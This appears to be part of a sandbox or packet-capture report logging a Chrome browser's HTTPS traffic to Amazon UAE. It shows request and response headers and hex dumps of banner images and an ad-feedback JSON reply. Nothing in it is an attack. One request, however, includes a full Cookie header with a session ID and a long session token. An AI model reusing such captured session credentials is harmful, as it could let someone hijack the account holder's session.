                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 7085
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 183a3632-efa0-4ea0-969d-e8c256f67c2c
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Thu, 30 May 2024 14:36:18 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Sun, 12 Jun 2044 19:43:22 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 2008322
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:48 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kjyo7100097-IAD, cache-nyc-kteb1890063-NYC
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 c8 00 f1 03 01 22 00 02 11 01 03 11 01 ff c4 00 32 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 04 05 06 07 02 03 08 01 09 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ec b0 00 00 00 00 00 00 00 00 22 f2 8e 76 29 a8
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"2"v)
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: c7 e5 67 c7 57 3e 73 24 fe e3 4d 22 f6 b9 8b d2 56 ed ec 62 72 3b b2 62 65 ea 48 0b 9e 34 30 e7 8e 53 1a ee f5 75 8a 63 cd 7e b3 59 ac 46 eb 17 95 8b f1 1e 42 56 e1 74 97 e4 6b 93 70 9b e0 79 ba 16 96 3c 4b 35 88 a8 0e a1 5a 03 ca 03 35 8c fb 41 31 1f a4 df ac 0d 37 4d 62 de 3b d7 58 ae 18 a9 1e b6 70 83 56 b7 8d 63 d7 31 73 2c cd be ed 7b bb 7a 2d d4 8a 5f 58 32 58 f4 19 46 78 d5 87 3a b9 66 72 1e 94 e5 05 27 54 cd ae 26 52 1e 8b 97 5c 19 29 1b 2e a4 e6 d9 99 61 d3 6d 55 5a 60 73 3b dd 27 88 33 c5 34 18 2f 63 33 95 ad ff 00 b5 3c 41 f1 32 6d 4b 2a e2 74 5b c8 7a 78 bf 0e 39 d5 aa af f8 bd f2 ce 11 93 85 ef 2b c4 ee 49 e7 76 74 27 32 b6 d7 77 88 c4 d2 2d a3 58 b9 3f ec de 09 85 c7 e2 9e e8 fd ab af 16 25 78 70 0c 31 35 c3 86 ec 53 c8 ad 98 30 64 f0 f1 3c
                                                                                                                                                                                                                                                                      Data Ascii: gW>s$M"Vbr;beH40Suc~YFBVtkpy<K5Z5A17Mb;XpVc1s,{z-_X2XFx:fr'T&R\).amUZ`s;'34/c3<A2mK*t[zx9+Ivt'2w-X?%xp15S0d<
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: cd 3d dd 6e 59 4e a4 b2 f0 97 25 fc 9c 59 c9 7f 23 f3 6f 25 97 1e e6 f2 59 6f cb e1 38 1f ec 51 13 7a e0 e4 df c1 64 8f b4 05 92 33 87 34 d1 c5 19 75 15 06 c6 fa d6 50 4a 29 f8 67 de 80 3b 42 6c 89 08 b8 2c a7 e2 b2 82 49 cd c5 77 67 f0 80 f7 21 88 4d c4 26 e2 13 71 09 b8 84 31 50 9a 23 1e 49 c2 49 f8 22 4a 6c e9 54 60 ae d0 de 34 46 09 e8 c7 45 76 86 f1 a1 a5 c6 cb b5 94 76 93 44 3a ba 98 5a 9f c4 f2 4e 8e 07 ae a0 ab 1d 74 7c 95 e3 41 50 55 d7 b2 ef 85 64 87 6d 6c b7 d4 d3 7e cf 25 ab 41 e9 2b d4 30 0a 10 6b a1 dc 85 27 7f dd 58 50 80 85 8b eb af db 15 e9 77 05 f6 f9 1b 7f 5a 0f a8 11 35 6f 16 d7 d6 a4 04 45 46 14 84 d0 77 47 b2 b7 d0 37 d7 20 be a3 c2 8d 06 ba 2e 85 07 42 22 20 e0 78 f5 b1 18 f1 de 3a 1a 0a ed 02 ba 2d 1d 7e d5 07 d5 f4 9e 49 c2 61 1e
                                                                                                                                                                                                                                                                      Data Ascii: =nYN%Y#o%Yo8Qzd34uPJ)g;Bl,Iwg!M&q1P#II"JlT`4FEvvD:ZNt|APUdml~%A+0k'XPwZ5oEFwG7 .B" x:-~Ia
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: 0c 67 ee 09 9f 3e 77 c9 83 22 08 d9 68 55 bf f0 4d 94 83 58 0f 65 54 6a 07 b8 54 24 cc c7 72 88 7d 0e c8 8a bc 54 21 f0 13 14 fd 62 be 9e 65 f5 f3 21 f6 bb a1 fe 5d 50 2d 1c 2b e5 78 43 d9 a2 a3 48 8f 70 81 53 46 f7 28 4e a4 07 65 43 9c c7 b9 00 18 40 58 04 e4 1f 92 12 8e eb 26 45 1b 80 2e 4b 2c 12 90 b9 0e c3 26 df e4 5b 5f 79 91 c8 7f c0 48 0c e0 52 0f 86 15 44 af 88 99 66 1b 03 80 58 04 c8 34 42 c1 fd 41 0e 41 40 5e 12 3d 9a b9 28 72 30 e6 3c c5 9e 84 1a 23 6f d1 72 63 71 28 77 19 c5 03 7c 12 4c 24 e4 22 53 55 8f c0 cc b8 27 44 d4 34 40 0e 40 ef 5d 90 00 75 56 3a 20 46 23 e4 f6 09 80 da 1d c7 2d f3 22 b9 41 bb 87 70 22 33 d8 81 de 26 63 fd a0 87 7a c6 80 23 aa 1a f0 68 96 2a 04 17 41 04 33 62 a1 7f 66 71 88 74 47 9a 25 e0 da 28 67 e4 7a c4 67 96 e6 7d
                                                                                                                                                                                                                                                                      Data Ascii: g>w"hUMXeTjT$r}T!be!]P-+xCHpSF(NeC@X&E.K,&[_yHRDfX4BAA@^=(r0<#orcq(w|L$"SU'D4@@]uV: F#-"Ap"3&cz#h*A3bfqtG%(gzg}
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: 57 7e 18 3d ac cb 14 95 5e a2 82 57 30 e6 21 e2 2a fd 6c a4 39 87 1e 8a 82 18 3c e7 14 57 b3 eb 89 6e 4c 13 2f d7 27 53 0f f7 19 4e b8 fa 67 fb 7f 1f 57 24 d5 5b 2e b9 d4 76 05 ef 2a 17 e7 de 1a 63 8d 49 44 35 b9 be 87 73 4f 77 d1 85 a5 a4 71 7b 17 17 56 2a 0b 46 5d 72 16 40 8b 74 c3 71 5f 93 fc 9c 13 f2 04 4f e3 4a 4d 59 f3 98 2f fe bc 20 9a a3 3a 6c 94 ca 86 38 32 f5 cb 44 81 6a 97 43 19 66 4a 08 0b 9c 41 56 83 6d ba 5c bf 2a ca 28 2c ea d5 f9 d4 48 2a 4e c4 d9 9d 94 b5 dd a0 a9 42 34 60 4a b0 f4 e1 9a 5a 95 58 b6 34 9a b5 16 0b 0d 53 71 e1 da ed 68 d1 73 7d 61 bd 8c a5 b6 cc a6 d0 95 e7 a1 14 57 37 28 57 9e 9e d6 d6 f0 be f4 51 ef 10 4b 52 55 cd 2f 85 fd a2 a2 dd 1e 44 fe 23 48 00 39 5a 08 15 30 69 16 e8 4f b6 0e 94 14 02 57 d6 c2 00 59 19 97 d2 bc 61
                                                                                                                                                                                                                                                                      Data Ascii: W~=^W0!*l9<WnL/'SNgW$[.v*cID5sOwq{V*F]r@tq_OJMY/ :l82DjCfJAVm\*(,H*NB4`JZX4Sqhs}aW7(WQKRU/D#H9Z0iOWYa
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC195INData Raw: 3d 04 8d 95 3f f4 e9 05 e6 79 23 e6 04 78 f3 a0 72 cc 30 a5 7b 58 4d ee b6 7e 61 fe ad 0c a6 24 33 44 e8 7c 44 7f b1 09 85 99 bd c4 fe 5c 47 e9 79 cf f9 85 83 97 87 99 13 a9 fb 17 70 08 68 e9 1c 62 98 37 eb 41 7d 5f c5 86 59 61 12 b1 31 0c 4c d6 c2 6c a8 fd 04 89 68 26 a3 3a 18 f7 ed 58 d6 e4 16 fe e4 3f c7 83 ff 00 65 9a 77 94 f4 ca 21 34 13 a5 1f 69 ac 5b aa b3 46 0e 85 7f 07 ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 ff da 00 08 01 02 01 09 3f 00 50 ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 ff da 00 08 01 03 01 09 3f 00 50 ff d9
                                                                                                                                                                                                                                                                      Data Ascii: =?y#xr0{XM~a$3D|D\Gyphb7A}_Ya1Llh&:X?ew!4i[Fp?Pp?P


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      136192.168.2.549867151.101.193.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC467OUTGET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Personalcare_186x116_2X_en_AE._SY116_CB566996700_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 4391
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 6fc36a1a-daea-4e15-a2ca-dd6ae31b52fa
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Mon, 12 Aug 2024 12:10:26 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Expires: Wed, 10 Aug 2044 14:51:07 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 429997
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:48 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kjyo7100134-IAD, cache-nyc-kteb1890074-NYC
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 08 08 08 08 08 08 09 0a 0a 09 0c 0d 0c 0d 0c 12 10 0f 0f 10 12 1b 13 15 13 15 13 1b 29 19 1e 19 19 1e 19 29 24 2c 24 21 24 2c 24 41 33 2d 2d 33 41 4b 3f 3c 3f 4b 5b 51 51 5b 72 6c 72 95 95 c9 01 08 08 08 08 08 08 09 0a 0a 09 0c 0d 0c 0d 0c 12 10 0f 0f 10 12 1b 13 15 13 15 13 1b 29 19 1e 19 19 1e 19 29 24 2c 24 21 24 2c 24 41 33 2d 2d 33 41 4b 3f 3c 3f 4b 5b 51 51 5b 72 6c 72 95 95 c9 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 03 04 05 06 07 02 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 eb 69 e9 3c cd 7c f9 f6 82 e5 98 a6 99 6b
                                                                                                                                                                                                                                                                      Data Ascii: JFIF))$,$!$,$A3--3AK?<?K[QQ[rlr))$,$!$,$A3--3AK?<?K[QQ[rlrt"4i<|k
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: d8 6a 5f 02 6d 5d 73 f3 50 ed 5d 93 67 16 5a 81 c7 5c 5b 9a 3d a7 b1 0f b3 d5 ef 73 fa 86 af c6 4b 3f 75 be ff 00 01 a9 bb 51 64 8a 58 da df 01 fa 83 4d da 7b 32 49 16 3a 8f fd 3b 54 1d a2 b6 9d c2 8b 2d 44 0f b4 6d 5c 81 f2 83 4a c1 94 30 e8 7a 64 11 fb ff 00 2c 29 62 05 3b 06 20 0f aa 39 0f f3 fa 1b ed 8d 12 ab 30 0c ce 02 67 ce 9b 4d 0e 4b 19 36 be 30 1d 7a fd f5 13 cc 2e da 29 f1 be 3d c0 1c 51 35 78 cb ea d3 6e e6 36 1a b2 9a e3 61 67 61 c1 41 d5 bf 70 ad 29 d4 da 36 0f 3e 27 7a 9b a9 a1 ce 8d aa 04 8c 80 dd ef 8d 48 15 58 85 ce 3e 3f 90 e7 62 ed f1 61 de f8 0f 2f a1 be 9d ed d2 32 98 e6 d8 39 15 a8 df dc 4f 72 db a4 3f 9b 6e e6 39 05 fd 15 71 ad 49 35 a4 41 64 31 dc 24 99 6d bc b2 31 d6 a4 d4 27 96 61 2c 8d 97 00 0d c0 00 79 52 6a c9 8c 3a e4 f9 8a
                                                                                                                                                                                                                                                                      Data Ascii: j_m]sP]gZ\[=sK?uQdXM{2I:;T-Dm\J0zd,)b; 90gMK60z.)=Q5xn6agaAp)6>'zHX>?ba/29Or?n9qI5Ad1$m1'a,yRj:
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: d8 db ee cf 59 41 78 75 68 50 bb 2a ed 79 60 32 a9 8f 6f 79 07 93 53 b4 2c 75 16 85 0a 44 66 43 1a 9e a8 86 52 55 7e e1 5a dd dd 94 fa 37 65 e1 82 78 5e 58 2c 5d 2e 15 06 19 1c 95 c0 7a d9 24 df 9b 45 2c ef dc 50 3a 96 6e 40 53 3c 7a 6e 9a 0c ac 36 41 00 2c 7e 11 af 3a ec e5 c4 da 85 84 77 12 36 25 b8 96 e5 ce e3 c9 4c 8c c7 15 06 93 22 db c6 1b 4e 66 97 60 de eb 75 1e 09 00 67 c6 a6 b2 bc 59 4f 06 d5 d1 76 6d 20 c8 af ff 00 71 51 59 5f 2b 8c da 6f 5f 11 b9 6b 42 82 7b 68 27 59 c0 56 79 cb 05 dc 18 85 c0 03 38 fa 4f c2 51 cd 9e 9d fb 61 fe 1b 55 b5 de 9f 66 a3 83 39 ef 7d 7c 71 d7 24 78 d3 bd a2 dc c1 3c 4d 91 c4 2d 22 81 26 7f 4f 7e ac af da ca dc 45 c3 91 8f 8e 26 64 1f 28 06 a4 b8 12 9b c6 c3 03 33 a3 00 58 bf 46 dc 72 c7 19 a2 cc c1 41 24 85 18 19 f0
                                                                                                                                                                                                                                                                      Data Ascii: YAxuhP*y`2oyS,uDfCRU~Z7ex^X,].z$E,P:n@S<zn6A,~:w6%L"Nf`ugYOvm qQY_+o_kB{h'YVy8OQaUf9}|q$x<M-"&O~E&d(3XFrA$
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC257INData Raw: 26 93 ce b6 82 0a 6d 00 21 38 83 97 a0 ae 47 93 f8 f4 21 3e 16 18 99 ee 69 66 07 91 84 95 ba 90 29 bb 47 90 94 41 1b 3b a7 2d dc 30 71 1d 7a 53 04 a9 4e 32 5b 3a dc d5 fb 2a 6c 92 46 8a a9 46 22 87 54 4c 51 32 7c 9c 70 0a bc 68 1e a6 96 d9 f1 67 e9 23 01 00 98 82 28 0b af 57 51 fc d0 17 08 00 07 9b af 68 14 5b e3 c2 b5 98 50 dd 2d d7 8c 4b c4 d5 b5 c3 e1 e6 c1 72 41 30 69 66 75 e5 e2 ff 00 7c cf f6 69 d6 92 bd e3 2a af 08 ec 62 37 de e9 bb 74 93 b4 80 3f 83 5c f0 4a ac 80 3d 65 5e 05 99 d4 0f cd 36 cd aa 56 92 da 44 83 e6 b7 79 56 ee a5 d4 80 4a 68 f3 77 0b 10 5b 47 e6 be 6c e9 ff 00 12 28 73 0f a7 61 b4 7e 6a f3 91 b8 b8 65 69 70 a6 3b 15 f1 af 20 6f 13 56 f7 4e 3c f2 01 20 0d eb ec 65 53 35 70 25 a5 0e e9 e1 a1 00 d5 ab 4e 17 d0 60 c6 5f 68 f5 46 91 e4
                                                                                                                                                                                                                                                                      Data Ascii: &m!8G!>if)GA;-0qzSN2[:*lFF"TLQ2|phg#(WQh[P-KrA0ifu|i*b7t?\J=e^6VDyVJhw[Gl(sa~jeip; oVN< eS5p%N`_hF


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      137192.168.2.54987318.239.36.214432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1608OUTGET /af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_desktop-ad-center-1_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22slotName%22%3A%22desktop-ad-center-1%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DROAZJXecL-vBvC-Yjxkq97kAAAGRdjK03wMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICDFIFP4%22%2C%22adCreativeId%22%3A%22577653937781864011%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D HTTP/1.1
                                                                                                                                                                                                                                                                      Host: www.amazon.ae
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=260-8031893-3804011; csm-hit=tb:s-APAVCQJMFK78QJEV1PMZ|1724264920834&t:1724264922221&adb:adblk_no; session-token=wUll0F4no7l9tPliyGKgLvlAAEELjfHKcJFzjW0ynq92lsg+mH223NtULYWESn2Mot8TG+uFHnE7n3w5VDki+yw05IIEV7ag/ggyw/YwGpMtnRbuMhFwzmUXe1lN0pukOaZb8Ih2JkZX1eXgZEKdKrDfkxF4guSmgyZNH6+9UULqN+0M8JltmEFqKKbiq149qIYHdGSMYteIDAV6KR/MM+XSRtI9JoamYzz/wm7syFkdpLE83Bh7Zl/MyCLwPiYE1VHyDDdBuun8drPYkCCGehL5uvaMNftgqo8GtBe6DKITy/jN+mPTvaEs15Vf3dQbiBG6BbttM0kNfgmvfMe/9If5U20+f6+p
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1079INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: application/json;charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:48 GMT
                                                                                                                                                                                                                                                                      Vary: Content-Type,Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                      x-amz-rid: PY9FN1MWB598DMEW4W37
                                                                                                                                                                                                                                                                      Accept-CH-Lifetime: 86400
                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                      Content-Security-Policy: upgrade-insecure-requests;report-uri https://metrics.media-amazon.com/
                                                                                                                                                                                                                                                                      Accept-CH: ect,rtt,downlink,device-memory,sec-ch-device-memory,viewport-width,sec-ch-viewport-width,dpr,sec-ch-dpr,sec-ch-ua-platform,sec-ch-ua-platform-version
                                                                                                                                                                                                                                                                      content-security-policy-report-only: default-src 'self' blob: https: data: mediastream: 'unsafe-eval' 'unsafe-inline';report-uri https://metrics.media-amazon.com/
                                                                                                                                                                                                                                                                      X-XSS-Protection: 1;
                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                      Via: 1.1 1c1b06236faf26f915b464406875de12.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P2
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: MuAuewzqemVwcKFN7VvQnaaWA3lSr6tD-uk0tWk11YAMn9xgAoZQ5w==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC4892INData Raw: 31 33 31 34 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 68 74 6d 6c 22 3a 22 3c 61 20 64 61 74 61 2d 61 2d 6d 6f 64 61 6c 3d 5c 22 7b 26 71 75 6f 74 3b 75 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 2f 61 66 2f 66 65 65 64 62 61 63 6b 2d 66 6f 72 6d 3f 70 6c 3d 25 37 42 25 32 32 61 64 50 6c 61 63 65 6d 65 6e 74 4d 65 74 61 44 61 74 61 25 32 32 25 33 41 25 37 42 25 32 32 61 64 45 6c 65 6d 65 6e 74 49 64 25 32 32 25 33 41 25 32 32 61 70 65 5f 47 61 74 65 77 61 79 5f 64 65 73 6b 74 6f 70 2d 61 64 2d 63 65 6e 74 65 72 2d 31 5f 64 65 73 6b 74 6f 70 5f 70 6c 61 63 65 6d 65 6e 74 25 32 32 25 32 43 25 32 32 70 61 67 65 54 79 70 65 25 32 32 25 33 41 25 32 32 47 61 74 65 77 61 79 25 32 32 25 32 43 25 32 32 70 61 67 65 55 72 6c 25 32 32 25 33 41 25 32 32
                                                                                                                                                                                                                                                                      Data Ascii: 1314{"status":"ok","html":"<a data-a-modal=\"{&quot;url&quot;:&quot;/af/feedback-form?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_desktop-ad-center-1_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      138192.168.2.54987218.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC704OUTGET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742947_3924059_186x116_1X_en_AE._SY116_CB566503778_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC961INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 5020
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: cfb6aabc-76ee-46d9-ba0d-5bfe328b61b2
                                                                                                                                                                                                                                                                      Date: Mon, 19 Aug 2024 03:25:42 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 09 Aug 2024 20:29:05 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-075,/images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742947_3924059_186x116_1X_en_AE
                                                                                                                                                                                                                                                                      Expires: Sun, 14 Aug 2044 03:25:42 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-075 /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742947_3924059_186x116_1X_en_AE
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 400be015a105355a3fb16d2aa2a6d926.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 226986
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
